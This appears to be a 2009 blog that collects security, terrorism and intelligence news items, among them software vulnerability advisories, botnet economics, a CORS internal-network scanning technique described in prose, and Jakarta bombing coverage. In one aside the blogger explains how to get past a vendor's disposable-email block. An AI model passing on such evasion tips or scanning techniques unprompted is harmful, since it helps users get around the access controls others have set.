Last week, on its regularly scheduled Patch Tuesday (second Tuesday of the month), Redmond issued software updates to plug nine security holes. Among those was a patch for a flaw in Windows and Internet Explorer that hackers were exploiting to break into PCs. However, it soon became clear that Microsoft had known about this vulnerability since at least April 2008.

On July 9, noted security researcher Halvar Flake published a blog post suggesting that the reason Microsoft took so long to fix the bug may be because the flaw was caused by a far more systemic problem in Windows.

According to Flake, the problem resides in a collection of code that Microsoft uses in a number of places in Windows. This code "library" is also provided to third-party software makers to help them build programs that can leverage certain built-in features of Windows.

As a result, Flake concluded, Microsoft may have fixed only a subset of the problem on Windows with its patch this month.

"The bug is actually much 'deeper' than most people realize," Flake wrote. "MS might have accidentally introduced security vulnerabilities into third party products."

I reached out to Flake for additional information, but he told me that shortly after he published that blog post he received a 3 a.m. phone call from Microsoft asking him please not to comment further.

Microsoft has not officially responded to requests for comment about Flake's research. But a source within Microsoft said Redmond could issue an out-of-band update prior to next month's Patch Tuesday to address the outstanding flaws.

The decision over whether to do that or wait until next month's Patch Tuesday may hinge upon whether attackers begin exploiting these other vulnerable areas by using Microsoft's patch (and Flake's research) as a guide to locating the flaws. What's more, this bug is almost certain to be discussed at Black Hat and Defcon, the world's largest annual security conferences, being held next week in Las Vegas.

Indonesian Unaware Husband was Noordin Mohammed Top - Jemaah Islamiya's Bomb Maker & Financier

Via Reuters -

The Indonesian wife of Noordin Top, the region's most-wanted militant because of his role in a string of bomb attacks in Indonesia, did not know his real name and thought he was a teacher, her lawyer said on Thursday.

Malaysian-born Top is one of the prime suspects behind last week's near-simultaneous suicide bomb attacks on the JW Marriott and Ritz-Carlton, two luxury hotels in Jakarta's main business district, which killed nine people and injured 53, including Indonesians and foreigners.

Police and security analysts said the attacks bore the hallmarks of Jemaah Islamiah (JI), the militant Islamist group responsible for previous attacks in Jakarta and on the resort island of Bali, or of a splinter group headed by Top.

Arina Rochmah was detained by the police under Indonesia's terrorism law, her lawyer Achmad Michdan told Reuters, adding that she could be charged for harbouring or hiding information about a terror suspect.

Michdan said Rochmah had no knowledge that her husband, Abdul Halim, was Noordin Top, although she admitted he was seldom at home due to his work teaching at an Islamic boarding school in South Sulawesi.

He said that police took Rochmah, 25, her two children and her mother on Wednesday from an Islamic boarding school founded by her father in Cilacap, in central Java.

Michdan added that Rochmah had come to Jakarta and asked for legal protection a few weeks ago, after the police raided the family's house. Police said that a bomb found at the house was identical to those used in Friday's blasts.

Under the terrorism law, police have seven days to declare someone a suspect.

--------------------------------

Having fleeing from Malaysia after the government cracked down on Islamists following the September 11th attacks, he married using an assumed name, Abdurrachman Aufi.

In early 2006, Noordin Top is believed to have drifted away from the main Jemaah Islamiah structure due to a disagreement about attacks on "soft targets", which often kill civilians. Police said he was claiming to lead a previously unknown group called Tanzim Qaedat al-Jihad.

In naming the group "Tanzim Qaedat al-Jihad," or "Organization for the Base of Jihad," Top has intentionally established a clear association with Osama bin Laden's al Qaeda, mimicking early moves by Abu Musab al-Zarqawi as he was seeking to establish his credibility in Iraq.

The Economics of Botnets

Via Viruslist.com -

In the past ten years, botnets have evolved from small networks of a dozen PCs controlled from a single C&C (command and control center) into sophisticated distributed systems comprising millions of computers with decentralized control. Why are these enormous zombie networks created? The answer can be given in a single word: money.

A botnet, or zombie network, is a network of computers infected with a malicious program that allows cybercriminals to control the infected machines remotely without the users’ knowledge. Zombie networks have become a source of income for entire groups of cybercriminals. The invariably low cost of maintaining a botnet and the ever diminishing degree of knowledge required to manage one are conducive to growth in popularity and, consequently, the number of botnets.

So how does one start? What does a cybercriminal in need of a botnet do? There are many possibilities, depending on the criminal’s skills. Unfortunately, those who decide to set up a botnet from scratch will have no difficulty finding instructions on the Internet.

---------------------------------

Check out the full article...good stuff.

Apple Backs Down On Bluwiki Threats

Via EFF -

Apple has retracted its legal threats against public wiki hosting site Bluwiki, and, in response, EFF is dismissing its lawsuit against Apple over those threats. The skirmish involved a set of anonymously authored wiki pages in which hobbyists were discussing how to "sync" media to iPods and iPhones using music library playback software other than Apple's own iTunes.

In November 2008, Apple sent a series of legal threats to the operator of Bluwiki, alleging that these hobbyist discussions about interoperability violated copyright law and constituted a violation of the Digital Millennium Copyright Act (DMCA), even though the author(s) of the pages had not yet figured out how to accomplish their goal. In response to Apple's legal threats, Bluwiki took down the wiki pages in question. In April 2009, EFF and the San Francisco law firm Keker & Van Nest sued Apple on behalf of OdioWorks, which runs Bluwiki, asking a court to reject Apple's claims and allow Bluwiki to restore the discussions.

On July 8, 2009, Apple sent letter withdrawing its cease-and-desist demands and stating that "Apple no longer has, nor will it have in the future, any objection to the publication of the iTunesDB Pages." As a result, EFF has moved to dismiss its complaint against Apple.

"While we are glad that Apple retracted its baseless legal threats, we are disappointed that it only came after 7 months of censorship and a lawsuit," said EFF Senior Staff Attorney Fred von Lohmann. "Because Apple continues to use technical measures to lock iPod Touch and iPhone owners into -- and Palm Pre owners out of -- using Apple's iTunes software, I wouldn't be surprised if there are more discussions among frustrated customers about reverse engineering Apple products. We hope Apple has learned its lesson here and will give those online discussions a wide berth in the future."

For more details:
http://www.eff.org/deeplinks/2009/07/apple-backs-down-blu

For more information about OdioWorks v. Apple:
http://www.eff.org/cases/odioworks-v-apple

Adobe Reader, Acrobat and Flash Player Vulnerability

Via US CERT -

Adobe has released a blog post indicating that it is aware of reports of a vulnerability affecting Adobe Reader and Acrobat 9.1.2 and Flash Player 9 and 10.

US-CERT encourages users and administrators to review the blog post and implement the following workarounds until the vendor releases additional information:

• Disable Flash in Adobe Reader 9 on Windows platforms by renaming the following files: "%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll" and "%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll".
• Disable Flash Player or selectively enable Flash content as described in the Securing Your Web Browser Document.

Additional information regarding this vulnerability can be found in the Vulnerability Notes Database.

US-CERT will provide additional information as it becomes available.

Russian Intelligence Granted New Powers Over Citizens

Via Jamestown Foundation -

On July 6, the Russian ministry of communications posted its Order 65, on its official website (www.minkomsvjaz.ru). Effective as of July 21, the order decrees that Russian postal services must make available for inspection on demand to the Federal Security Service (the FSB, the main successor to the Soviet KGB) and seven other Russian security service agencies any private mail or shipments, as well as its exhaustive data on senders and addressees. Special rooms where security officers will be able to open and inspect private mail were decreed to be established at post offices. Order 65 also cancels the privacy of electronic correspondence. Operators will now formally grant the security services access to their electronic databases.

Though Soviet or Russian security services never hesitated to intercept, monitor, inspect or confiscate private correspondence, nothing like Order 65 has ever occurred openly, formally or so blatantly -not even under Soviet rule.

Order 65 is in manifest contravention of the 1966 International Covenant on Civil and Political Rights (ICCPR), a United Nations treaty, based on the Universal Declaration of Human Rights -Russia is a signatory to both. It is also in contravention of Article 23 of the Russian constitution, which proclaims the complete privacy of telephone, postal and other communications and states unequivocally that this privacy can be lifted solely on the authority of the courts.

However, Order 65 contains no reference to making private correspondence available to the security services on the strength of a court decision. The Order leaves such decisions at the discretion of the security services. In 2000 and 2007 the Russian supreme court (and also in 2003 in the constitutional court) upheld Article 23 of the constitution, and ruled that mail operators could not disclose private correspondence or telephone communications to the security services, without first securing a court order (www.newsru.com, July 15).

Yuri Vdovin, a prominent St. Petersburg's based human rights activist, told the Echo Moskvy Radio that Order 65 signifies a decisive step towards a totalitarian state. Unless this is revoked, Vdovin maintains, the next steps will include unlawful detentions and searches. Vdovin believes that the authorities are seeking ways to prevent possible social unrest, and take under their control any structures that might emerge in order "not to let the people speak their mind" (www.newsru.com, July 15).

At the same time as this secret police surveillance of correspondence was openly decreed, the ministry of the interior (the MVD) were setting up special regional task forces to keep track of public attitudes, in an effort to prevent public protests, caused by the worsening economic situation in Russia. Interior Minister Rashid Nurgaliyev told the press that he expected this effort to allow the police and authorities to work preemptively and prevent an escalation of protests during the economic crisis. Nurgaliyev wants incoming evidence of growing social tension to be analyzed. If economic factors are deemed responsible, police will inform local officials and the government in order to launch preventive measures jointly, and keep any potential unrest under control (www.theotherrussia.org, July 15).

To complement this massive gathering of information, the MVD is also strengthening its already considerable forces to act on the basis of the information obtained. In the Moscow suburbs, they are now forming a new elite brigade named "avant-garde," which will specialize in maintaining public order during large-scale demonstrations. The force is expected to deploy across the country at short notice (www.theotherrussia.org, July 15).

These latest steps form a new chapter in Russia's progression towards a totalitarian state, and they logically complement previous punitive measures, launched by the Putin government, previously highlighted by the Jamestown Foundation (EDM, January 5). Some Russian experts now estimate the total strength of the MVD and other security forces at 2.5 million, which are assigned to crush the projected domestic protests. They see this process as a crisis demanding the militarization of the state (www.newsru.com, July 14).

Osama Bin Laden's Son Thought Killed in Predator Strike

Via The Long War Journal -

Sa'ad bin Laden, the son of Osama bin Laden, is thought to have been killed in a US Predator airstrike in Pakistan's tribal areas. The report has not been confirmed.

Sa'ad is thought to have been killed during a strike earlier this year, US intelligence officials told The Long War Journal.

"We're pretty sure but we're not certain," one official said. "We are hopeful."

US intelligence officials want to confirm or deny Sa'ad's death by using DNA testing. But it is unclear if they have recovered a body from the attack site.

The officials would not identify the date or the location of the airstrike that is thought to have killed Sa'ad. The covert US air campaign has focused heavily on North and South Waziristan. Fifty percent of the attacks occurred in South Waziristan, and 38 percent took place in North Waziristan, according to data compiled by The Long War Journal. The US has killed a total of 22 High Value Targets, which include some of the high- and mid-level Taliban and al Qaeda leadership in the tribal agencies since the first strike was reported back in June 2004 [see LWJ report, US Predator strikes in Pakistan: Observations].

Al Qaeda has neither confirmed nor denied Sa'ad's death. Al Qaeda typically issues a martyrdom statement for senior leaders and commanders who have been killed in battle.

Sa'ad is considered a senior leader in al Qaeda. He is an operational commander who was involved in the 2003 bombings in Riyadh, Saudi Arabia. He is known to shelter in Iran and move back and forth across the border with Pakistan.

He is reported to have facilitated communications between Ayman al Zawahiri and Qods Force, the notorious special operations branch of the Iranian Revolutionary Guards Corps, in September 2008 after the deadly attack on the US embassy in Yemen.

Sa'ad made "key decisions for al Qaeda and was part of a small group of al Qaeda members that was involved in managing the terrorist organization from Iran," according to the US Treasury report that designated him as a terrorist on Jan. 16, 2009. "As of September 2008, it was possible that Sa'ad bin Laden was no longer in Iranian custody," the Treasury reported.

Sa'ad is believed to have entered Pakistan’s northwest to meet with Zawahiri in Pakistan sometime in early September, according to Mike McConnell, the outgoing Director of National Intelligence.

NSA Using Cloud Model For Intelligence Sharing

Via InformationWeek -

The National Security Agency is taking a cloud computing approach in developing a new collaborative intelligence gathering system that will link disparate intelligence databases.

The system, currently in testing, will be geographically distributed in data centers around the country, and it will hold "essentially every kind of data there is," said Randy Garrett, director of technology for NSA's integrated intelligence program, at a cloud computing symposium last week at the National Defense University's Information Resources Management College.

The system will house streaming data, unstructured text, large files, and other forms of intelligence data. Analysts will be able to add metadata and tags that, among other things, designate how securely information is to be handled and how widely it gets disseminated. For end users, the system will come with search, discovery, collaboration, correlation, and analysis tools.

The intelligence agency is using the Hadoop file system, an implementation of Google's MapReduce parallel processing system, to make it easier to "rapidly reconfigure data" and for Hadoop's ability to scale.

The NSA's decision to use cloud computing technologies wasn't about cutting costs or seeking innovation for innovation's sake; rather, cloud computing was seen as a way to enable new scenarios and unprecedented scalability, Garrett said. "The object is to do things that were essentially impossible before," he said.

NSA's challenge has been to provide vast amounts of real-time data gathered from intelligence agencies, military branches, and other sources of intelligence to authorized users based on different access privileges. Federal agencies have their own systems for sharing information, but many remain disconnected, while community-wide systems like Intellipedia require significant user input to be helpful.

The NSA effort is part of Intelligence Community Directive 501, an effort to overhaul intelligence sharing proposed under the Bush administration. Current director of national intelligence Dennis Blair has promised that intelligence sharing will remain a priority.

"The legacy systems must be modernized and consolidated to allow for data to actually be shared across an enterprise, and the organizations that collect intelligence must be trained and incentivized to distribute it widely," he said in response to questions from the Senate prior to his confirmation.

The new system will run on commodity hardware and "largely" on commercial software, Garrett said. The NSA will manage the arrayed servers as a pool of resources rather than as individual machines.

Deutsche Bank Fires Two as Possible Inquiry Looms

Via NYTimes -

Two executives have been fired at Deutsche Bank as prosecutors consider whether to open a criminal inquiry into surveillance measures conducted against board members and a shareholder advocate.

The executives fired were Wolfram Schmitt, head of investor relations, and Rafael Schenz, German security chief, a person with direct knowledge of the matter said on Tuesday. The person was not authorized to speak on the record and declined to be named.

The bank had ordered an internal review of possible violations of privacy laws in May, after several cases came to light. On Monday, the data protection agency for Hesse, the state where Deutsche Bank is based, said it had forwarded the case to state prosecutors in Frankfurt, after reviewing a preliminary report by the independent law firm Cleary Gottlieb Steen & Hamilton, which had been hired by the bank to conduct the review.

Doris Möeller-Scheu, a prosecutor and spokeswoman for the Frankfurt prosecutor’s office, said the office had received a “very big dossier” and would need about three weeks to decide whether a criminal investigation was warranted.

Ronald Weichert, head of media relations at Deutsche, said the bank could not comment until the report on its internal investigation was finished.

In May, the bank issued a statement saying that it had “learned about possible violations which occurred in past years of the bank’s internal procedures or legal requirements in connection with activities involving the bank’s corporate security department.”

The dismissal of Mr. Schmitt stems from the case of Michael Bohndorf, a shareholder with a history of litigation against the bank who was known to ask critical questions at its shareholder meetings.

After a shareholder’s meeting in 2006, Deutsche Bank hired private investigators to spy on Mr. Bohndorf, posing as vacationers to rent his house in Ibiza and trying to establish a link between him and Leo Kirch, a media tycoon who had waged a legal battle against the bank accusing it of provoking the collapse of some of his companies.

Around that same time, private investigators tested the security measures that Deutsche’s chief operating officer, Hermann-Josef Lamberti, took to protect himself from being tracked and bugged. Detectives tried to plant a GPS device on his car and to smuggle an inactive listening device into his house with a flower delivery.

Chinese News Sites Go Down After Reports on Gov't Scandal

Via cio.com -

Two of China's most popular technology news Web sites went offline Tuesday after carrying news reports that linked the son of China's president to a corrupt African deal.

The technology news sections disappeared for several hours from major Chinese portals Sina.com.cn and NetEase.com early Tuesday afternoon, when they started redirecting viewers to general news pages. Both tech sections had carried reports on a state-owned company accused of bribing Namibian officials in the last day, but those reports were missing when the Web pages reappeared.

The suspensions appeared to be a government penalty against the companies for reporting on a sensitive political issue.

"I'm impressed by the bravery of Sina and Netease in attempting to report this at all," said Rebecca MacKinnon, a Hong Kong-based expert on the Internet in China, in an online message.

Information on top leaders' children has always been off-limits in Chinese media, though the Internet has made it more difficult to control discussions on such topics, MacKinnon said.

Chinese police heavily patrol the Internet, and Internet companies run rigorous screening to prevent sensitive information from appearing on user forums or in search results on their sites. Companies can be punished if that process fails to catch certain political or pornographic content.

"This is not particularly surprising or different from long-standing censorship patterns," MacKinnon said.

A story posted on the NetEase tech page the night before its suspension cited English broadcaster BBC as saying that Nuctech, a Chinese company, was suspected of bribery in a deal to provide scanners for airports and ports in Namibia. The BBC report had said Namibian authorities wanted to question Hu Haifeng, the former company president and son of Chinese president Hu Jintao, but did not suspect him in the case.

The NetEase story did not mention Hu, but said Namibia wanted to question "relevant" Nuctech executives.

Sina's tech page carried a similar article the next morning, hours before the sites went down. After the tech sections returned to the portals, visiting the URLs of the scandal reports returned messages that they could not be found or had been deleted.

An employee who answered the phone at NetEase Tuesday said its tech section was down for tests. Sina did not respond to a request for comment.

Nuctech's parent company, Tsinghua Holdings, controls a range of other technology companies including Chinese PC maker Tsinghua Tongfang.

Vordel SOAPBox is Now Free!

http://www.vordel.com/products/soapbox/

Vordel SOAPbox allows developers to test the performance, scalability, and security of Web Services. Using SOAPbox, a developer can test how Web Services perform under load, how they deal with unexpected input, and what their traffic ceiling is.

Vordel SOAPbox highlights security tokens, XML Signatures, and encrypted content in XML documents. SOAPbox supports established security technologies such as SSL and HTTP-Auth, as well as next-generation security technologies such as WS-Security and SAML.

-------------------------

My team has been using this tool for quite some time...and it was worth the money.

But now it is free. Just input your e-mail...and download.

Vordel has made an attempt to block the use of free e-mail accounts (i.e. Mailinator) but they forgot to include the alternative mailinator domains, like sogetthis.com ;)

GAO: Many Federal Agencies Still Don't Meet Security Standards

Via DarkReading -

Virtually all of the U.S. federal government's key civilian agencies are still falling short of the security marks they have been asked to meet, according to the Government Accountability Office (GAO).

In a report (PDF) issued earlier today, the GAO says of the 24 agencies reviewed, almost all had deficiencies in security controls and management, "leaving them vulnerable to attack or compromise." The GAO says it has made "hundreds" of recommendations to the agencies, yet many have not been addressed.

During the past three years, the number of incidents reported by federal agencies to U.S.-CERT has increased by almost 200 percent -- from 5,503 in 2006 to 16,843 in 2008, according to the report. More than one-third of the incidents are still under investigation, and the sources of the compromises are not yet known.

Of the incidents in which the sources are known, approximately 22 percent were caused by improper use of computers by authorized users, the report states. Eighteen percent of the compromises were caused by unauthorized access, and 14 percent were caused by malicious code. About 12 percent of the breaches were caused by scans, probes, or attempted access by external attackers, the report says.

Of the 24 agencies reviewed, 13 reported "significant deficiencies" in information security, the GAO says. Seven agencies reported "material weaknesses" that still have not been repaired. Only four agencies reported "no significant weakness," the report states.

Indonesian TV Identifies Another Jakarta Hotel Bomber

Via xinhuanet.com -

An Indonesian television on Tuesday evening unveiled identity of another suicide bomber at Ritz Carlton Hotel as Ibrahim, a florist at the hotel, who conducted his action on Friday along with fellow Nurhasbi at JW Marriott Hotel in Jakarta.

Based on the cctv record seconds before the blast at 07:47 at Erlangga restaurant at Ritz Carlton Hotel, a man suspected as Ibrahim of 36, walked unsteadily carrying a black bag which seems very heavy, Metro television said.

The whereabouts of Ibrahim has been unknown since the bombings at the two luxurious hotels which located opposite each other on July 17 that killed nine people and wounded 55 others, half of them foreigners. The police conducted DNA test to make sure the body of Ibrahim.

Based on the hotel presentation list Ibrahim was working on Friday morning, the day of the bombings.

He called his family before the blasts.

After the bombings, his family had looked for him at some hospitals where the victims of the explosions were being treated.

Police are identifying parts of bodies found at the scene, but it is still unknown yet whether one of them is belonging to Ibrahim.

The perpetrators of the bombings assembled the bombs at room 1808 at JW Marriott Hotel. They ordered the room on July 10 and occupied it at 15:01 Jakarta time (0901 GMT) on July 15, two days before conducting their deadly acts. Police found active bomb in a black laptop computer bag after the blasts.

The police have found similarities in equipment and method of the bombs with those detonated in Bali in 2002 and 2005, and that found in recent raid in Cilacap of Central Java, in which the regional militant network of Jemaah Islamiyah was responsible.

Police widens investigation on the group.

The blasts in JW Marriott Hotel and Ritz Carlton Hotel in Jakarta's main business district occurred after four-years absence of major terrorist acts in the country.

Indonesia had been attacked by a series of terrorist attacks from 2000 to 2005, including Bali bombings, the JW Marriott explosion and the Australian embassy bombings in Jakarta that killed more than 250 people.

The police and analysts said that the bombings in the two hotels were led by a breakaway of Jemaah Islamiyah led by Malaysian fugitive Noordin Moh Top, who had organized the major bombings in Indonesia, targeting foreigners and facilities. He has been main target of the police.

U.S. Steps Up Pressure on 'The Company' - Leaders of Los Zetas

Via Yahoo! News (AP) -

The Department of State offered up to $50 million Monday for information leading to the arrests of 10 top Mexican drug suspects accused of key roles in a violent organization estimated to have sold more than $1 billion worth of drugs in the United States.

U.S. Attorney Benton J. Campbell said the reward money and new federal charges were among U.S. efforts to dismantle a powerful drug trafficking organization known as The Company, whose members came from an elite security force called Los Zetas.

The only name on an indictment unsealed in federal court in Brooklyn was Miguel Trevino-Morales, a fugitive charged with operating a continuing criminal enterprise, international cocaine distribution and firearms violations. The indictment also sought the forfeiture of $1 billion in drug proceeds.

Campbell said in a release that Trevino-Morales, who could face life in prison if convicted, was the principal leader of Los Zetas, a group that includes former members of the Air Mobile Special Forces Group of the Mexican military who went into the drug-smuggling business.

In Washington, the Department of State announced it was offering a total of $50 million for tips leading to the capture of the defendants, including four leaders who were designated as narcotics kingpins by the U.S. Department of the Treasury's Office of Foreign Assets Control.

The government said it was offering up to $5 million apiece for information leading to the arrests of 10 people, one of whom has been captured.

Nineteen defendants have been charged in an indictment in federal court in Washington with drug trafficking-related crimes, and others are charged in indictments in federal court in Houston.

"The joint efforts announced today are significant steps in the department's strategy to stop the flow of illegal drugs into our communities and the shipment of drug proceeds back to Mexico," Campbell said.

Assistant Attorney General Lanny A. Breuer said the actions taken Monday will at least make it more difficult for the drug dealers to move cash around.

"We have learned that the most effective way to disrupt and dismantle criminal organizations is to prosecute their leaders and seize their funding," she said in a release. "We stand shoulder-to-shoulder with our brave Mexican colleagues in the fight against these destructive cartels."

The Foreign Narcotics Kingpin Designation Act, which became law in 1999, prohibits all trade and transactions between U.S. companies and individuals and significant foreign narcotics traffickers, their organizations and associates who act on their behalf.

Fewer than 100 people have been designated narcotics kingpins since the first major targets were announced in June 2000.

The indictment unsealed in Brooklyn said the drug organization, formerly known as the Gulf Cartel, had become the dominant force in the drug trade along the Gulf of Mexico, transporting multi-ton quantities of cocaine each month from Mexico to Texas after obtaining it in Guatemala, Colombia, Venezuela and elsewhere.

XMLHTTPReqest “Ping” Sweeping in Firefox 3.5+

Via ha.ckers.org (Rsnake) -

Jeremiah brought my attention to the new Firefox 3.5+ CORS (Cross-Origin Resource Sharing) which is a way to do a cross domain XMLHTTPReqest. Does that sound scary? Well, it is, but there’s been a ton of work into hardening it. It has all sorts of cross domain opt-in verification built into it to limit the abuse. Honestly, if you look at the people who were acknowledged in it’s construction, it’s a who’s who of people who understand cross domain browser security issues. So it wasn’t surprising that it was fairly free of obvious flaws.

Anyway, I was poking around with it and I noticed that it had one fairly strange issue. Although an attacker is not allowed to know if the page was there or not (only if it was allowed to see the content or not), the attacker is still allowed to make an initial request. In doing so that initial request can be used as a pseudo “ping” sweep. You can tell if the site is there or not because it will either return immediately (latency and threading applies) or it will wait around much longer (between 20-75 seconds on the several networks I’ve run this on) before the browser gives up. That timing difference is pretty substantial - and as a result you can enumerate a substantial amount of internal address space behind the victim’s firewall and relatively quickly. I created a demo here (works only in Firefox 3.5+ and you must enable JavaScript globally for this to work). It won’t work if you just whitelist ha.ckers.org you have to globally allow JavaScript if you use Noscript for the demo to work - and you must disable ABE in Noscript as well.

You can read the page for the details, like the fact that basic and digest authentication popups are suppressed which makes this technique ideal for Intranets where those are common and would normally alert a user to the fact that something was wrong in the browser. It also doesn’t matter whether you do or don’t have port 80 open for this to work, I should note that there is a IE8.0 version of Firefox’s XMLHTTPRequest called XDomainRequest, but I didn’t have much time this weekend to try to get it working in both browsers so I have no idea if it has the same issue or not.

Incidentally, Jeremiah and I both gave the thumbs up to the idea of a cross domain XHR several years ago when the Mozilla team first asked us about the concept. Because there are so many other things wrong with the browser Jeremiah and I told them that it wouldn’t change much - the browser is already so broken from a security perspective that it really didn’t matter - a sad commentary thinking back. Of course, it really is all about the implementation.

How to Dismantle a Nuclear Bomb

Via BBC (h/t Tim of ubiwar.com) -

How do you dismantle a nuclear bomb? And how do you verify another country is genuinely disarming without compromising sensitive national security material?

BBC security correspondent Gordon Corera was given exclusive access to a unique exercise run by the UK and Norway to find out.

The nuclear weapon is carefully lifted out of a large container and moved onto the floor.

Two engineers use an electric screwdriver to open up a side compartment and remove the "physics package" containing the sensitive parts of the bomb.

A scientist with a radiation detector beckons me forward as he points his machine towards the box.

It begins to emit an accelerating beeping noise. "The measurement is approximately a hundred times normal background radiation," he tells me.

"But it is not dangerous, I promise," he adds with a smile.

he lack of danger is because the bomb is not real. To inject an element of realism into this experiment, a weak radioactive material - Cobalt 60 - is used.

The dismantlement experiment is a joint exercise between the UK and Norway - the first of its kind - and was held a few miles from Oslo.

The five-day exercise has been keenly anticipated internationally as a way of building trust between nuclear weapons states and non-nuclear weapons states.

It is designed to see if one country can verify the disarmament of another country's nuclear weapon, but without any sensitive information about national security and weapon design being compromised.

In a role reversal, the Norwegians play a nuclear weapons state (called Torland) and the UK team play inspectors from Luvania, a non-nuclear weapons state.

[...]

"The aim is to develop methodologies we could use in inspections of a real nuclear facility but in an environment in which can do trial and error," explains Andreas Persbo of Vertic, which helped organise the event.

It is not an exercise in which the nuclear state is trying to clandestinely divert nuclear material or the inspecting side search for a covert facility.

[...]

In practice no nuclear weapons state has ever allowed a non-nuclear weapons state to verify disarmament. But if there was to be multilateral disarmament in the future, it may well be important to provide such states with confidence over its actions.

Officials on both sides hope that this and any future events will lead to better understanding between nuclear weapons states and non-nuclear weapons states and more collaborations, allowing trust and confidence to be increased.

DC17 Badge Pre-Release Information

https://forum.defcon.org/showthread.php?t=10655

Here are a few useful pieces of information to help you get set up and/or prepare for the DC17 Badge Hacking Contest. Unlike last year, all of the badge design documentation, including development environment, should be on the CD this year, unless there was a last minute change that I'm unaware of. Even still, I'd HIGHLY recommend getting your tools set up in advance so you come to DEFCON ready to rock. Remember, the Badge Hacking Contest is now a BLACK BADGE contest, so the stakes are raised...

* The processor this year is a Freescale MC56F8006 Digital Signal Controller. It's a brand new part, but the DSC family has been around for a while and there is plenty of code samples/examples and application notes on Freescale's site.

Main product page:
http://tinyurl.com/lyorks

Direct link to data sheet:
http://www.freescale.com/files/dsp/d...06.pdf?pspll=1

* The development environment is Freescale CodeWarrior for DSCs. It's a similar IDE to previous badges (sorry, still Windows only AFAIK, but works fine in a VM). I used Processor Expert to help with the device configuration, so you'll probably want to familiarize yourself with that feature.

Link to the tool (free, no license required):

Special Edition: CodeWarrior for 56800/E Digital Signal Controllers
http://www.freescale.com/lgfiles/upd...SSET=Downloads
or
http://tinyurl.com/kuwloq

* There will a serial bootloader on-board to enable you to easily load your own firmware onto the badge (simply requiring a terminal program, like HyperTerminal, and the hex file). However, this year will require a bit more soldering skill to get it up and running and you will need a level shifter to convert the 3V TTL-level serial of the badge to RS232 or USB level. We'll have a few level shifter kits in the Hardware Hacking Village, but I'm sure those will go quickly, so if you're reading this, BRING YOUR OWN LEVEL SHIFTER, buy something like this: http://www.ftdichip.com/Products/Eva...L-232R-3V3.htm or bring components to put one together (an FTDI FT232R)

* In the case of completely bricking your badge during a firmware update via the bootloader, you can completely reprogram it via the MC56F8006 JTAG interface and the USB TAP hardware (I'll have one with me for emergencies).

Information on the USB TAP:
http://www.freescale.com/webapp/sps/...sp?code=USBTAP

* AFAIK, Freescale is sending at least one engineer to come and experience DEFCON, hang out, and offer technical support for hacking/developing with the badge. The Hardware Hacking Village will serve as the Badge Hacking HQ and he'll be located there. I'll try to spend as much time as I can up there, too, but the more help I give, the less likely you'll win the contest :P

Teenager Creates Fake Airline with Some Serious Social Engineering Skills

Via Times Online UK -

A teenage boy from Yorkshire succeeded in persuading British aviation executives that he was a tycoon about to launch his own airline. Using the pseudonym Adam Tait, the smooth-talking 17-year-old told airport and airline executives that he had a fleet of jets.

Tait, who said he was in his twenties, even flew to Jersey to attend a 1½-hour long meeting with the director of its airport. Their talks were considered promising enough for a further meeting to be arranged, which was due to be held next week.

Other air industry bosses found themselves dealing by telephone or e-mail with Tait’s fellow executives, David Rich and Anita Dash, who proposed to launch a cut-price Channel Islands-based airline servicing most of Europe.

What no one realised was that Tait, Rich and Dash were all the same person: an aircraft buff with the gift of the gab and an overactive imagination.

[...]

The Yorkshire teenager’s six-month-long ruse, which included placing articles in industry magazines, foundered only after one publication, Airliner World, became suspicious. It started to unravel the complex network that Tait had set up of fake websites, “virtual offices” complete with a real telephone receptionist and bogus names.

Last Monday he was questioned by Essex police while trying to gain access to a 93-seater jet at Southend airport, having convinced the plane’s marketing agent that his “company” wanted to lease it.

The police, who had intervened after being tipped off by Airliner World, discovered the boy’s true identity. Although no further action was taken, his fantasy was finally grounded.

The Sunday Times has agreed not to use Tait’s real name at the request of his father, who did not know of his son’s exploits until he was contacted last week.

He said that his son suffered from a form of autism and was “a phenomenal individual who is enterprising and creative” with an ability to recall the exact detail of every airline’s flight schedules. But the autism also made his behaviour highly challenging.

“He has been passionate about aeroplanes for about two years and his whole bedroom is plastered with them,” he said.

“Before that he came within two days of bringing the US cast of High School Musical to a 300-seat theatre in Shropshire by cutting and pasting mastheads from one company to another, masquerading as this or that.

“It would have happened, except when booking the hotel some queries were thrown up. I don’t know why he did it. He is not nasty or vindictive or malicious.”

Mozilla Says Stack Overflow Crash Not Exploitable (CVE-2009-2479)

Via Mozilla Blog -

In the last few days, there have been several reports (including one via SANS) of a bug in Firefox related to handling of certain very long Unicode strings. While these strings can result in crashes of some versions of Firefox, the reports by press and various security agencies have incorrectly indicated that this is an exploitable bug. Our analysis indicates that it is not, and we have seen no example of exploitability.

On Windows, Firefox 3.0.x is terminated due to an uncaught exception during an attempt to allocate a very large string buffer; this termination is safe and immediate, and does not permit the execution of attacker code. In Firefox 3.5.x on Windows, the allocations are more robustly checked and no crash will result.

On the Macintosh in Firefox 3.0.x and 3.5.x, a crash occurs inside the ATSUI system library (part of OS X), due to what appears to be a failure to check allocation results. This issue is likely to affect any application using the recommended text-handling libraries on OS X. We have reported this issue to Apple, but in the event that they do not provide a fix we will look to implement mitigations in Mozilla code. We recommend that other developers who use these libraries consider a similar practice, and we have added mitigations in the past for similar bugs in these libraries.

As a result of our analysis, we do not believe that this represents an exploitable vulnerability in Firefox. Further, we believe that the IBM report is in error, and that the severity rating in the National Vulnerability Database report is incorrect. We have contacted them and hope to resolve the inaccuracies shortly.

Mike Shaver
VP Engineering, Mozilla Corporation

Captured U.S. Soldier in Taliban Video Identified

Via ABC News -

Department of Defense officials confirmed the identity of a captured American soldier in a video posted online Saturday by the Taliban.

Pfc. Bowe Bergdahl, 23, of Hailey, Idaho, went missing from his base in eastern Afghanistan on June 30. On July 3, officials declared him "missing-captured."

Early in the video, a captor holds up the soldier's dog tag to the camera. Later Bergdahl states his name and hometown.

Bergdahl is a member of 1st Battalion, 501st Parachute Infantry Regiment, 4th Brigade Combat Team, 25th Infantry Division, out of Fort Richardson, Alaska.

Taliban Releases Video of Captured U.S. Soldier

Via thestar.com -

The American soldier who went missing June 30 from his base in eastern Afghanistan and was later confirmed captured, appeared on a video posted Saturday to a website by the Taliban, two U.S. defence officials confirmed.

The soldier is shown in the 28-minute video with his head shaved and the start of a beard. He is sitting and dressed in a nondescript, grey outfit. Early in the video one of his captors holds the soldier's dog tag up to the camera. His name and ID number are clearly visible. He is shown eating at one point and sitting on a bed.

